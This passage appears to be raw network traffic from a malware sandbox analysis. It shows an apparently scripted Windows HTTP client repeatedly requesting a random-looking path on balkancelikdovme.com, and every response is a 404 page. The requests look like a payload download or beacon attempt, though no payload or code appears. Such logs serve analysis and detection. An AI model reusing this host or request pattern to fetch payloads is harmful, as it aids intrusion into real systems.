Aug 23, 2023 20:09:05.454005003 CEST	110	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:05 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:05.715500116 CEST	110	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:05.756218910 CEST	111	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:05 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:06.029077053 CEST	111	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:06.062642097 CEST	112	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:06 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:06.276963949 CEST	112	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:06.310146093 CEST	113	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:06 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:06.536585093 CEST	114	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:06.569278002 CEST	115	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:06 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:06.816421986 CEST	115	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:06.849179029 CEST	116	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:06 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:07.111725092 CEST	116	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:07.144984961 CEST	117	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:07 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 